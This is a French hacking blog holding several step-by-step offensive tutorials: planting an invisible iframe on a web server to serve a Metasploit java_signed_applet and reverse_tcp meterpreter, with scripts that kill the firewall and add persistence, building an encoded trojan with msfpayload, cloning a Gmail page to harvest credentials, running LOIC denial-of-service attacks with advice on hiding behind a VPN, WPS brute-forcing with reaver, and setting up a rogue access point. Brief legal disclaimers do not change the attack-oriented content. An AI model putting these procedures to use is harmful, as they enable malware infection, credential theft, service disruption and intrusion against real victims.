Overblog
Suivre ce blog Administration + Créer mon blog
4 novembre 2012 7 04 /11 /novembre /2012 16:52

Yop à toutes et à tous !


 

Un nouveau tuto en perspective avec un titre à la zob :)

 

PWNING SURF = Page html/php avec une iframe cachée qui va nous permettre d'utiliser Metasploit Framework et son meterpreter .

En d'autres termes, la machine victime se fera pwn en surfant sur une page Web contaminée qui proposera l'installation d'un plugin JAVA..

 

Il s'agit d'une technique très connue des blacks hats qui se servent de failles xss sur des sites vulnérables, pour y implanter une iframe. Cet iframe sera déclenchée sur le navigateur de la machine qui visite le site vulnérable. Au moment ou la machine victime affichera l'iframe, le navigateur ira contacter l'adresse IP contenue dans iframe (donc la machine attaquante), et lancera un script/meterpreter/backdoor sur la machine victime (ou autre chose).

 

Imaginez un site avec un fort traffic, se prendre une iframe malveillante, et donc contaminer tous les visiteurs qui surf sur le site, ou en gros, comment créer un botnet à moindre cout.

 

 

UN PETIT SCHEMA POUR METTRE TOUT CA EN IMAGES :)

 

Sans titre-copie-1

 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

 

N'hésitez pas à poster des commentaires si vous avez besoin de précisions, de conseils ou d'une machine à distance pour tester vos skills ^^.

Dans un souci de compréhension des commandes de Metasploit, allez faire un tour sur mon tuto précédent.

Les commandes à taper sont colorées en "orange" et munies de "".

 

 

Description du tuto video : (vidéo en bas de page)

 

-MACHINES UTILISEES-

SERVEUR WEB VULNERABLE : 192.168.1.65

MACHINE BACKTRACK ATTAQUANTE : 192.168.1.25

MACHINE CLIENT VICTIME : 192.168.1.45

 

L'attaque va se dérouler comme ceci :

La machine attaquante (192.168.1.25) va implanter un iframe dans la page d'accueil index.html sur le serveur WEB (192.168.1.65)(iframe qui va rediriger de façon invisible les clients connectés sur 192.168.1.65 vers 192.168.1.25)

Pour montrer ce qui se passe coté client, on peut voir sur la vidéo qu'un utilisateur (192.168.1.45) se connecte sur le site web 192.168.1.65 et déclenche le processus d'installation de l'applet JAVA malicieux. Une fois l'installation acceptée, on voit sur la Backtrack qu'une session meterpreter est établie.

 

--------------

 

L'attaque est réussie lorsque une brèche est ouverte au niveau du navigateur. L'installation de l'applet Java est une option parmi d'autres. On pourrait choisir un module Metasploit (browser_autopwn) qui nous permet de tester les eventuelles brèches qui existent sur le navigateur. Cette technique nous permet le "fingerprinting"() du navigateur client et le lancement ciblé d'exploits. Ce qui signifie que lorsque le client va se connecter à l'adresse malicieuse, son navigateur sera scanné (exemple Google Chrome) et le module va lancer toutes les failles connues contre le navigateur en vue de trouver une porte ouverte, ou au moins une brèche dans laquelle se glisser.

 

Mais cette fois-ci, nous allons utiliser un module bien précis : L'applet Java Signé". (java_signed_applet)

Ce module va lancer un serveur sur notre Backtrack qui fera apparaître un pop-up sur le navigateur du ou des clients  qui se connecterons au site.

Si le pop-up est accepté, et que l'applet java est lancé, le ou les clients seront "infectés" et laisseront une porte ouverte par laquelle un meterpreter pourra passer.

(Faites gaffe à pas valider n'importe quoi quand vous êtes sur un site plutôt louche) 

 

--------------

 

Après la théorie, passons à la pratique.


--------------

  __________________

|MACHINE ATTAQUANTE|

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

On va donc commencer par lancer msfconsole en tapant "msfconsole" ou "./msfconsole". Une fois démarré, nous allons configurer un "java_signed_applet", comprenez un module qui va se lancer sur notre backtrack et attendre qu'un client arrive sur notre adresse:port, exemple :192.168.1.25:8080".

 

 

Lorsque vous venez de selectionner votre module/exploit ou payload, vous pouvez taper "info" pour connaître les fonctions du modules ou "show options" pour les différents paramètres que vous pouvez lui assigner.

Donc, après avoir fait notre "use exploit/multi/browser/java_signed_applet", nous pouvons taper "show options" et voila ce qu'il nous affiche :

 

screen show options

 

 

Les paramètres des modules se configurent tous de la même manière, à savoir, : set "NOM PARAMETRE" "VALEUR".

Exemple : dans notre cas, nous avons besoin de configurer quelques paramètres pour que notre attaque se déroule correctement. Ici, nous allons configurer APPLETNAME, qui est le nom qui apparaîtra dans le pop-up, et URIPATH (comprenez, l'endroit exact de notre site/adresseIP qui une fois visité déclenchera l'attaque). Je commence donc par taper "set APPLETNAME Malicious", puis "set URIPATH /" et enfin je vérifie la configuration en tapant "show options".

 

Nous devons aussi configurer un payload pour s'occuper de la connexion Attaquant-Victime au moment ou l'applet sera lancé. Si vous ne configurez pas cette option vous même, Metasploit le fera mais les paramètres du payload seront standards ce qui ne vous ira peut-être pas.

 

Rentrons un "set payload /windows/meterpreter/reverse_tcp", affichons ses paramètres si besoin est avec un "show options" et enfin configurons ses paramètres avec un "set LHOST 192.168.1.25" et "set LPORT 6793". Si vous avez bien lu le début de ce tuto, vous savez (mais j'en remet une couche pour être sûr ^^) que LHOST=ip attaquante, LPORT=port attaquant, RHOST=ip vicitme ou 0.0.0.0 pour accepter toutes les ip/connexions et RPORT= le port cible/ souvent 8080.

 

Nous n'avons plus qu'à lancer notre attaque en tapant "exploit ".

Voila notre machine attaquante est en écoute et est prête à servir un applet Java malicieux à quiconque se connectera à l'adresse http://192.168.1.25:6793 (soit l'adresse de notre machine attaquante sur le réseau et le port sur lequel elle est en écoute), ce qui nous donnera une fois installé, un magnifique meterpreter.

 

Une chose à savoir sous Metasploit :

Si vous venez de lancer un exploit en background par exemple, vous pouvez toujours taper vos commandes, comme "sessions -l" pour voir si il y a des sessions meterpreter/shell qui sont disponibles. Si une session est disponible, Metasploit vous l'affichera comme ceci :

 

03.png

 

Ensuite pour intéragir avec votre session meterpreter, vous pourrez taper "sessions -i 1" (ou 1 représente l'ID de la session visible dans la colonne ID)

Un exemple ci dessous :

04

 

Et voila, si vous n'êtes pas encore un aficionado du meterpreter, tapez un "?", vous aurez la liste des commandes disponible avec CE meterpreter. Car on peut facilement le bricoler pour lui ajouter des fonctions, ou encore le rendre autonome.

Un petit exemple :

Une fois que vous avez configuré votre meterpreter ou votre exploit, créez un fichier autometer.rc et modifiez le avec un éditeur de texte. Ce fichier servira de script lorsque qu'une session sera créee. Maintenant, nous allons écrire les actions à effectuer automatiquement une fois la connexion établie :

 

exemple du contenu de autometer.rc :

 

"run post/windows/manage/migrate"       <- pour migrer automatiquement le trojan sur un autre processus

 

"run post/windows/manage/killfw"             <- pour /kill le firewall

 

"run post/windows/manage/checkvm"       <- pour vérifier si l'hôte est sous machine virtuelle

 

Un ordre par ligne avec une ligne vide entre chaque et sans guillemets.

 

Une fois votre fichier script sauvegardé dans /root/ par exemple, il ne vous reste plus qu'à configurer un dernier paramètre avant de lancer votre exploit dans Metasploit. Ce paramètre sert à prendre en compte un fichier script lors de l'exécution d'un meterpreter sur une machine victime.

Dans l'invite de commande msf> tapez "set AutoRunScript multi_console_command -rc /root/autometer.rc"

 

 

  ------------------------------------------------------------------------------------------

 

 

 

 

 _________________

|MACHINE  SERVEUR|

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Pour déclencher l'installation de l'applet Java malicieux sur la machine victime, on pourrait demander à Bobby (l'utilisateur victime) de visiter notre lien malicieux directement, soit http://192.168.1.25:8080.

Si il est plutôt méfiant, l'astuce consiste à cacher cette url dans une autre page grâce à l'iframe invisble.

Pour utiliser cette technique, il faut avoir un droit d'écriture sur le serveur WEB, ce qui ne devrait pas être trop difficile vu que c'est une de vos machines ;D.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

CETTE PARTIE EST REALISABLE AVEC UN ACCES SSH SUR LE SERVEUR WEB  |

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

 

Compromition du site WEB

 

La machine qui héberge le site Web est une Backtrack elle aussi mais la distribution importe peu tant qu'on peu écrire sur la page d'accueil.

Si vous n'avez pas de serveur Web chez vous, la manière la plus rapide est de prendre une vieille machine, d'y installer Backtrack 5, et une fois l'install terminée et le PC rebooté, ouvrez un terminal et tapez "service apache2 start" pour lancer le serveur Web. Les fichiers servis sur ce site Web se situent dans /var/www/. Avec les paramètres par défaut, la page d'accueil de ce site s'appelent index.html. (il y a aussi la solution de la machine virtuelle).

 

Pour compromettre ce site de test, et proposer au clients l'installation de l'applet Java malicieux, nous allons modifier la page d'accueil "index.html" avec un "nano /var/www/index.html" et chercher les balise <body> et </body>. C'est entre ces deux balises que ce situe le corps de la page Web et c'est ici que nous allons donc ajouter notre iframe.

 

Petite note : les fichiers HTML s'ouvrent aussi bien en ligne de commandes qu'avec les éditeurs de textes standards.

 

Une iframe est un code html compris entre deux balises iframes soit : <iframe>code</iframe>

Ces balises particulières servent à implanter le "visuel" d'un autre site sur notre page. Un petit exemple :

Sans-titre-copie-2.png

 

On peut voir "Mon site Web"(page d'accueil d'un autre serveur de test, page qui se situe dans /var/www/) auquel j'ai ajouté le code "<iframe src="http://www.google.com"></iframe>".

Ma page perso affiche bien son contenu, PLUS, un cadre contenant l'iframe, soit le moteur de recherche Google.

Ce screenshot est un montage pour vous montrer à quoi ça ressemble, car on ne peut pas ajouter une iframe "Google".

Plutôt étrange, mais je ne vais pas m'attarder la dessus^^.

 

On peut voir que cet iframe est VRAIMENT visible, et on ne veut surtout pas que le client s'aperçoive de la feinte.

Si on entre l'IP:PORT de notre Backtrack dans l'iframe tel quel, on aura le droit à un grand cadre aussi grand que celui-la mais avec les mots assez révélateurs comme "java_signed_applet, module for Metasploit" ou encore "payload=windows/meterpreter/reverse_tcp". Pas très cool et pas très discret non plus.

 

Pour la rendre invisible, il nous faut appliquer quelques paramètres à cet iframe, dans le code source de la page Web.

Une bonne iframe invisible s'écrit, par exemple, comme ceci :

<iframe src="http://192.168.1.25:8080" height="0" width="0" style="visibility: hidden"></iframe>

Une fois ce code ajouté entre les balises <body> et </body> de notre index.html, sauvegardez le tout et vérifiez le fonctionnement de votre page Web.

Ouvrez un navigateur sur votre serveur Web et tapez : http://127.0.0.1 dans la barre d'adresse.

Jetez un oeil sur votre Backtrack qui est en attente depuis tout à l'heure. Vu qu'un navigateur s'est connecté au site, et par la même déclenché l'iframe, vous devriez voir de l'activité dans votre msfconsole.

 

ET VOILA LA VIDEO-TUTO

 

 


 

 

Une fois l'applet installé, le client peut se déconnecter du site, mais nous conservons notre session meterpreter.

On pourrait par la suite taper dans notre session meterpreter> un "run persistence -A -x -i 60 -p 6793 -r 192.168.1.25" ce qui installera sur la machine victime, un script vbs dans les "TemporaryFiles" et une clé registre qui vont se lancer à chaque démarrage de la machine et essaieront de contacter 192.168.1.25:6793 toutes les 60secondes (-i).

 

 

Pour une utilisation externe (de box à box), vous devrez ouvrir les bons ports et les router vers les bonnes machines.

 

exemple avec les IP et PORTS du tuto:

 

Serveur WEB

_______________________________

ouvrir port 80 et router vers 192.168.1.65|

 

Linux Backtrack

__________________________________________

ouvrir le LPORT (ici 6793) vers 192.168.1.25                  |

- et -                                                                                          |

le port 8080 qui doit être joignable pour lancer l'iframe|

 

Ne reste ensuite plus qu'à donner soit l'adresse IP externe soit le nom de domaine du site WEB et le tour est joué. :D

 

 

 

Cet article est destiné à un but éducatif et/ou de prévention. Assurez-vous de demander la permission au propiétaire du matériel si vous voulez faire ce tuto en "conditions réelles".

 

Comme d'habitude, un souci, un conseil, utilisez les commentaires :D

 

Rédaction : PWNED&CO[M@jesTiK]

 

    ------------------------------------------------------------------------------------------

Partager cet article
Repost0
12 juillet 2012 4 12 /07 /juillet /2012 02:45

 

Yeaaaah bienvenue à toutes et à tous sur cet article qui va traiter d'un des nombreux outils disponibles sur Backtrack 5 R2.

 

Nous allons aborder aujourd'hui un outil que j'aime beaucoup car il permet de faire beaucoup de choses.

 

Il s'agit de Metasploit Framework, un outil développé par les labos de Rapid7 en langage Ruby, disponible sous Linux et Windows.

Cet outil est constitué d'une enorme base de données régulièrement mise à jour d'exploits (failles de logiciels), de payloads (trojans), et de modules auxiliaires (scans et autres).

 

Nous allons donc voir aujourd'hui la création d'un trojan et son utilisation, ainsi que l'interface graphique ARMITAGE, qui nous permet de piloter Metasploit de façon visuelle, plutôt qu'en lignes de commandes. Je voulais publier la partie Metasploit en ligne de commandes dans ce tuto, mais sa rédaction me demande un peu plus de temps. Soyez assurés qu'il sera publié avant la fin du mois.

 

 

Comme d'habitude, les commandes sont écrites en "orange"

 

 

 Je vais commencer par vous expliquer comment l'attaque va se dérouler :

 

 

  MSFPAYLOAD & MSFCLI

 

(LHOST = IP machine attaquante)

(LPORT = PORT machine attaquante)

(RHOST = IP machine victime)

(RPORT = PORT machine victime)

 

Dans cette première partie du tutorial, je vais vous expliquer comment pénétrer une machine grâce à un trojan fait maison.

 

Dans la première video, je commence par créer un troyen grâce à la commande :

 

"msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=6793 R | msfencode -c 10 -t exe -o /root/Desktop/trojan_test.exe"

 

Explication

 

Je demande à msfpayload d'utiliser le payload (trojan) windows/meterpreter/reverse_tcp. Je configure LHOST soit l'IP de ma machine attaquante ainsi que LPORT soit le port sur lequel la machine victime va venir me contacter et je lui demande de sortir mon troyen en format RAW (R), soit non-encrypté. Je continue en lui demandant, grâce à (|), d'envoyer le résultat de cette commande dans msfencode en spécifiant des paramètres comme -c 10, soit 10 itérations pour l'encryptage, -t exe pour que mon fichier sorte en .exe et enfin le chemin de sortie ou je vais récupérer mon troyen (-o /root/Desktop/trojan_test.exe).

 

------------------------------------------------------------------------------------------------------------------------------------------------

 

Maintenant que notre troyen est terminé, dirigez vous à l'endroit ou vous l'avez enregistré (/root/Desktop/ pour ma part), et copiez le sur votre machine victime.

 

Avant de lancer cet exécutable sur la machine victime, nous devons lancer un listener sur la machine attaquante.

Le listener va écouter sur un port spécifique de notre machine et attendre que la machine infectée lui fasse signe.

Une fois que l'exécutable sera lancé, le trojan ira contacter la machine attaquante (grâce aux paramètres LHOST et LPORT), en d'autres termes, il discutera avec notre listener.

Dès lors que la connexion s'établie, notre machine victime fait signe à notre machine attaquante qu'elle est prête.

 

------------------------------------------------------------------------------------------------------------------------------------------------

Le lancement de ce listener est très simple :

 

"msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=6793 E"

 

Explication

 

Je configure le programme msfcli pour attendre une connexion sur le LHOST (IP attaquante) et sur le LPORT qui correspond au troyen windows/meterpreter/reverse_tcp.

 

Une fois que msfcli est en attente d'une connexion, il ne vous reste plus qu'à lancer le troyen sur la machine victime.

 

Sur la machine victime, double-cliquez sur l'exécutable.

Dès que le troyen sera lancé, vous pourrez remarquer qu'il y a de l'activité dans votre konsole msfcli.

Effectivement, dès que msfcli a détecté la tentative de connexion, il envoie un bout de programme contenant tout un tas de commandes sur la machine victime.

Une fois que msfcli est prêt, il vous affiche ceci :

[*] Started reverse handler on XXX.XXX.XXX.XXXX:xxxx (soit LHOST:LPORT)

[*] Starting the payload handler

 

-----------------------------------------------------------------------------------------------------------------------------------------------

 

Dès que la connexion est effectuée, msfcli vous signale :

[*] Meterpreter session 1 opened (LHOST:LPORT -> RHOST:RPORT)

 

L'invite de commande de msfcli va alors se transformer en ceci :

meterpreter >

 

Voila il ne vous reste plus qu'a taper "?" pour vous émerveiller devant les possibilités de ce meterpreter.

Les commandes disponibles sont expliquées brievemment mais on peut facilement comprendre à quoi elles servent.

 

Un petit avant-gout : Captures des touches tapées au clavier, capture d'écran, vncviewer, et tout un tas de joyeusetés aussi puissantes les une que les autres. Je vous laisse les découvrir par vous même ^^.

On a même la possibilité de lancer un script de persistance, ce qui aura pour effet de lancer le trojan à chaque démarrage de la machine victime.

 

Et voila la vidéo ^^

 

 

 

 

 

 

----------------------------------------------------------------------------------------------------------------------------------------------- 

 

 

ARMITAGE

 

 

 

Bien maintenant voyons la méthode graphique. Armitage est un GUI destiné à l'utilisation de Metasploit par l'intermédiaire d'une interface graphique. Armitage fonctionne avec postgreSQL et peut donc stocker vos scans, ainsi que les vulnérabilités des hôtes. Tout de suite, la vidéo !

 

 

 

 

 

 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Si vous recevez un message d'erreur comme quoi le service de base de données Postgresql n'a pas pu être lancé, et que vous apercevez le message "Fatal Bogus in postmaster.pid file", c'est qu'un fichier de la bdd est corrompu.

Pour remedier à cela, tapez dans une konsole :

"rm /opt/metasploit/postgresql/data/postmaster.pid"

"rm /opt/metasploit/postgresql/.s.PGSQL.7337"

"rm /opt/metasploit/postgresql/.s.PGSQL.7337.lock"

(utilisez l'auto-completion pour trouver plus facilement ces fichiers :) (7337 est le port utilisé par postgresql sur ma machine, le nom de vos deux fichiers peuvent différer donc.)

 

puis il ne vous reste plus qu'a relancer le service postgresql en tapant :

"/etc/init.d/framework-postgresql start"

-------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

 

 

 

Petit rappel :D : Cet article est avant tout destiné à ceux qui veulent tester leur réseau personnel. Les attaques montrées ici peuvent évidemment être utilisées n'importe où, contre n'importe qui. Cependant nul n'est censé ignorer la loi, et ce genre d'attaque peut vous faire gagner un voyage tout frais payés en taule. Alors faites gaffe quoi !

 

Rédacteur : Pwned&Co [M@jestik]

Partager cet article
Repost0
30 avril 2012 1 30 /04 /avril /2012 01:44

 

Yop à tous et à toutes !

 

Bienvenue dans ce premier tuto vidéo orienté hack basé sur Backtrack 5 R2.

J'aborderai dans ce tuto, l'utilisation du Social Engeenering Toolkit, la fameuse boîte à outils.

Pour toute question, utilisez la partie commentaires.

 

 

ps : Pour l'utilisation "externe" du Social Engeenering Toolkit, faites un cd /pentest/exploits/set/config puis nano set_config

 

Cherchez-y la ligne AUTO_DETECT=ON et remplacer par AUTO_DETECT=OFF.

 

Maintenant, lorque vous utiliserez le Credential Harvester , il vous demandera l'adresse IP à laquelle renvoyer les informations de connexions.

 

Je m'explique :

 

Je lance un Credential Harvester (clone de la page gmail par exemple) sur ma backtrack 5 d'adresse IP locale 192.168.1.25. Pour pouvoir accéder à ma page clonée depuis "l'extérieur", je dois forwarder (ouvrir) le port 80 de ma box et le router vers 192.168.1.25 port 80. Jusque la ça va.

 

Au moment de la configuration du Credential Harvester, si S.E.T.est réglé sur AUTO_DETECT=ON, il pensera forcement que vous êtes en local et utilisera automatiquement votre IP locale (ici 192.168.1.25). Si on regle cette option sur OFF, il vous demandera à quelle adresse IP envoyer les identifiants récoltés. Etant donné que nous sommes en utilisation externe, nous devons configurer une adresse joignable depuis Internet soit votre IP publique. Si vous voulez plus d'infos à ce sujet, postez un comm ^^

 

Je vous rappelle que l'utilisation à des fins illégales et/ou sans le consentement des personnes dont vous attaquez les réseaux est punie par la loi. Faites gaffe à ce que vous faites. Cet article présente une manière simple de se faire voler ses identifiants à son insu. Vous êtes prévenus, regardez si il y a du https vant de rentrer des identifiants quelque part.

 

Allez à bientôt les gens et restés connectés ^^.

 

#!//Roll a spliff and get high, every day and every night//!#

 

 

Rédacteur : M@JesTiK

Partager cet article
Repost0
25 février 2012 6 25 /02 /février /2012 11:35

   

   Bonjour à tous !!!

 

      Aujourd'hui l'équipe Pwned And Co va vous apprendre à effectuer une attaque de type DOS ou DDOS.

Nous allons allons voir la différence entre l’attaque DOS et DDOS

La fameuse attaque utilisée par Anonymous à l'encontre de Sony ...

      Bien jouez les mecs ... mais cela n’a pas suffi !!! Ou et notre très cher dual boot PS3 ????????? Toujours pas la et il ne reviendra probablement jamais ...

 

Commencon par un petit rapel ...

 

Qu'est-ce que l'attaque DOS ?


      Une attaque par déni de service (denial of service attack, d'où l'abréviation DoS) est une attaque ayant pour but de rendre indisponible un service, d'empêcher les utilisateurs légitimes d'un service de l'utiliser. Il peut s'agir de :

  • l’inondation d’un réseau afin d'empêcher son fonctionnement ;
  • la perturbation des connexions entre deux machines, empêchant l'accès à un service particulier ;
  • l'obstruction d'accès à un service à une personne en particulier.

      L'attaque par déni de service peut ainsi bloquer un serveur de fichier, rendre impossible l'accès à un serveur web, empêcher la distribution de courriel dans une entreprise ou rendre indisponible un site internet.


 Qu’est-ce que l'attaque DDOS ?


      Prenez l'acronyme précédent et rajoutez "Distributed" c'est à dire Distribuée. Qu'est-ce que cela change? Eh bien au lieu d'utiliser une seule machine (peu efficace), plusieurs machinesoft telechas vont s'investir dans l'opération. Avec, ou sans le consentement de leurs propriétaires. Je m'explique, il y a deux "types" de DDoS :
      - Les attaques orchestrées par des hacktivistes (cf Anonops) qui utilisent la fonction Hivemind de LOIC : vous mettez votre machine à contribution, ou alors vous participez de votre côté comme un grand.
      - Les attaques DDoS qui utilisent des Botnets. Ce sont des réseaux de machines contrôlées par un hacker (ou plus souvent par un équipe) qui lancent des attaques DDoS sans que le propriétaire de ladite machine soit au courant... Le plus grand Botnet de l'histoire a atteint 500 000 machines... Imaginez le trafic que cela peut générer...
      Il existe des softs (que je ne nommerai pas) qui permettent à un hacker de mettre en place un botnet et de lancer l'attaque DDoS sans avoir à utiliser chaque machine.

 

                /!\ A SAVOIR AVANT DE COMMENCEZ CE TYPE D'ATTAQUE !!!


        - Une attaque DOS seul a peu de chance de réussir sauf sur un petit serveur.

        - Il est important de ce couvrir dans ce genre d'attaque !!! Utiliser un VPN ...

        - Si vous ciblez des grande organisation (SONY, Paypal, Facebook ...) assurez-vous d'êtres super protégé sinon vous êtes mort !!! Pire que ça !!! WANTED !!! Prison ... Donc utilisez une putain de protection hypra super méga efficace de type VPN payant…

 

Procédure de l'attaque DOS


      1- On va commencez par télécharger ce fameux logiciel nommé LOIC (Google est encore une fois et sera toujours votre amie …)

 

Qu'est-ce que LOIC ?


      LOIC, pour Low Orbit Ion Cannon, est une application de test de réseau, écrite en C# et développée par Praetox Technologies. Cette application tente d'attaquer par déni de service le site ciblé en inondant le serveur avec des paquets TCP, des paquets UDP, dont des requêtes HTTP avec l'intention de perturber le service d'un hôte particulier.

« NewEraCracker » a mis à jour LOIC pour l'Opération Payback (mené par Anonymous) et a corrigé quelques bugs.

      Depuis la version 1.1.1.3, LOIC comporte une nouvelle option nommée « Hive Mind » qui autorise le contrôle de LOIC par un opérateur de salon IRC. Cette option est aussi appelée « botnet volontaire ». Très utile pour mener une attaque DDOS.

      Pour toutes les versions de LOIC il est assez facile de reconnaître l'adresse IP de l'attaquant, s'il n'est pas protégé par un réseau ou proxy anonymiseur.

 

      2- Une fois ce soft téléchargé lancez-le.

      4- Une jolie et très simple interface graphique apparait.

      3- Insérer l'adresse du site visée ou l'IP puis clic IMMA CHARGIN MAH LAZER.

      4- L'attaque DOS est maintenant lancer.

 

/!\ Il faut savoir qu'une attaque DOS mener seul a moins de viser un petit serveur a peu de chance d'aboutir.

    Cela nous amène à attaquer une cible en groupe c’est-à-dire a mener une attaque DDOS, qui elle sera beaucoup plus efficace face à des gros serveurs.

 

Voilà en espérant que ce petit tuto vous sera utile … Beaucoup d’autre à venir notament  par la suite mais comme tout le monde nous avons de l’argent à faire rentre donc pas le temps de s’occuper trop du site … 

 

 

Rédacteur : Lakai0rFake

 

 

Partager cet article
Repost0
24 janvier 2012 2 24 /01 /janvier /2012 22:33

Salut à tous et à toutes.

Désolé pour le manque d'activité, mais le temps libre n'est pas la chose que nous avons le plus en ce moment ^^.

Mon tuto sur le Social Engineering Toolkit devait sortir ce mois-ci, mais la publication sera retardée pour cause de réécriture. Vous inquitez pas, y'a du lourd en stock !!

 

Cette fois-çi, je vous relaye des infos sur un petit programme a tester. Son nom est "reaver" et il existe sur linux.

 

----------------                            ------------------------                       -------------------                  -------------------------------             -----------

Les fournisseurs d'accès ont eu la bonne idée d'adopter le WPA2 et compagnie. En revanche, la, ils ont pondu un système tellement naze, le mec qui à développé ça à du taper un trip sous acide avant quoi...

 

Le WPS (Wifi Protected Setup) est un système de simplification de la "longue" clé WPA.

Destiné aux amis seniors, aux gros noobs de la mort, ou aux amnésiques, il permet de sécuriser son réseau en WPA, mais de n'utiliser qu'une clé de 8 caractères numériques (lol?).

 

Les bienfaits de ce système sont que votre pauvre bulbe de batracien n'aura plus à mémoriser votre clé WPA de 26 caractères mais une clé plus simple de 8 caractères.

 

Le souci vient du fait que ce service peut être brute-forcé, donnant accès au réseau tout simplement.

 

Condition obligatoire : le service WPS doit être activé sur le routeur.

(Les liveboxs aurait la particularité, d'avoir cette fonctionnalité activée d'office avec un code usine "1234567890".

(Info à vérifier...)

 

 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

 

OK ON S'Y MET !!!!!!! On démarre notre Backtrack 5 (Mise à jour : apt-get update && apt-get upgrade)

 

Les commandes en orange et TOUJOURS EN MINUSCULES, sauf indication contraire.

 

-Pour installer cette merveille, ouvrez simplement une konsole, avec une connexion internet active, et tapez-y :

 

apt-get install reaver

 

-Lorsque le programme sera installé, tapez dans la konsole : reaver --help, pour obtenir de l'aide sur ce prog.

 

L'exemple type d'utilisation est "reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv"

 

Nous appelons donc "reaver" sur l'interface (-i) mon0 (mode monitor), sur le bssid XX:XX:XX:XX:XX:XX (remplacez par l'adresse MAC victime), en mode verbose (-vv) ce qui aurait pour effet d'afficher chaque phase de l'attaque dans la konsole.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Et voila à vous de jouer. Je l'ai personnellement testé sur 3 routeurs différents sans succès pour le moment, car faute de temps pour terminer l'attaque. Aller chercher dans l'aide du programme, il y a possibilité d'accélérer la vitesse du crack.

 

Je vous rappelle que cet application n'est à utiliser sous aucun pretexte contre des réseaux et points d'accès qui ne vous appartiennent pas et/ou d'on vous n'avez pas les permissions necéssaires.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Le site Megaupload ayant tristement fermé boutique (sniff, grosse larme...!), l'hébergement des fichiers destinés à mes tutos sera actualisé dans la semaine. Comme d'habitude, n'hésitez pas à poser vos questions orientée hack, demande de tutos, de scripts, ect...

 

           #//Roll a spliff and get high, every day an every night//#

 

                 Rédacteur : [M@JesTiK]

 

 

Partager cet article
Repost0
30 juin 2011 4 30 /06 /juin /2011 05:30

Chers lecteurs, bonsoir ou bonjour peut-être !

Me revoici avec un petit sujet très sympa sous le bras^^
J'ai planché pas mal de temps dessus, mais le voila fonctionnel.
(Surement une erreur de ma part, et qui m'a couté quelques heures de sommeil...)

 

La voici, la voila : LA ROGUE AP (Point d'Accès Voleur)

 

-Une Rogue AP bien configurée peut vous permettre de récupérer moultes informations (Clé WPA, WEP, informations bancaires, adresse email), si vous vous y prenez bien. Phishing ou Social-Engineering, appelez ça comme vous voulez, cependant ça marche du tonnère !

 

-Elle consiste en fait, à créer soi-même une Box, ressemblant en tous points à une Box Victime.

 

-La Rogue AP est "comme" une NeufBox ou box d'autre marque, elle peut fournir des pages WEB de configuration et/ou de login. Si elles sont bien réalisées, le client se sentira en confiance et rentrera ce que vous voulez qu'il rentre.

 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
VOICI NOTRE OBJECTIF :

 

-Configurer une Rogue AP avec un serveur WEB en local diffusant une fausse page de login qui va nous permettre de récupérer certaines informations, moyennant la crédulité des personnes qui y seront connectée.

 

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

VOICI NOS PREREQUIS :

- BACKTRACK 5 (préalablement installé ou en mode live grâce à mon tuto sur le cassage de clé wep)

- Une bonne carte WiFi (je vous recommande encore une fois la AWUS036h (chipset rtl8187L)Alfa_AWUS036H.jpg

- Le Package "Tout-en-un" téléchargeable ->ici<-

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ALLEZ ON SE ROULE UN GROS SPLIFF ET LET'S GO KIDS !!!

 

RESPECTEZ LES MAJUSCULES ET MINUSCULES A LA LETTRE

 

(Les commandes à taper sont surlignées en orange)

 

ETAPE 1 : L'INSTALLATION

 

-Commençons par booter sur BACKTRACK 5 (installé en dur, c'est préférable, comme ça vous n'aurez pas à réinstaller les fichiers de configuration à chaque boot).

 

-Configurons notre accès Internet pour le bon déroulement des opérations à suivre.

 

-Commencez par démarrer le programme "Wicd Network Manager", dans Menu KDE->Internet->Wicd Network Manager

 launch-wicd.PNG

 

-Configurons notre accès Internet :

config-wicd-1.PNG

-Voici la partie connexion cablée (Wired Connection), toujours en haut de la liste si vous en disposez d'une. (1)

-Cliquez sur Préférences (2)

-Renseignez votre interface Ethernet (3) [ifconfig dans une konsole pour plus de détails] (eth0 par défaut)

-Renseignez votre interface WiFi (4) [ifconfig dans une konsole pour plus de détails] (vide par défaut)

-Validez (5)

-Un petit coup de Refresh (6) pour afficher les connexions nouvellement trouvées par votre interface WiFi.

 

Voila vous n'avez plus qu'à cliquer sur "Connect" pour lancer votre connexion Ethernet.

--------------------------------------------------------------------------------------------------------------------------------------------------------------------- 

 

Pour le WiFi :

configuration-wireless-wicd.PNG

 

-Un coup de "Refresh" (1)

-Wicd vous affiche ce qu'il à trouvé en réseaux WiFi dans les alentours (2)

-Configurez votre connexion en cliquant sur "Properties" (3)

-Cochez "Use Encryption" (4)

-Selectionnez votre type "d'Encryption" : WEP hexa/WEP passphrase, WPA 1/2 etc... (5)

-Rentrez votre clé WEP/WPA dans cette boîte de dialogue (6)

-Validez en cliquant sur "OK" (7)

-Finalement cliquez sur "Connect" (8)

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Petit point à noter : Pour mettre votre Backtrack chérie à jour, ouvrez une konsole et tapez : apt-get update, attendez que ça se termine puis tapez : apt-get upgrade.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

-Nous allons maintenant télécharger le programme "dhcp3-server" qui va nous servir à attribuer automatiquement une IP à quiconque se connectera à notre Rogue Ap. Ouvrez une Konsole (ou terminal si vous êtes sous Gnome, mais comme tout un chacun le sais, les gnomes ça craint XD!), et tapez-y : apt-get install dhcp3-server.

 

-Puis Nous allons installer quelques dépendances pour notre serveur Apache. Ouvrez une Konsole et tapez-y : apt-get install php5-common php5 php5-gd libapache2-mod-php5(servent à la gestion des pages PHP)

 

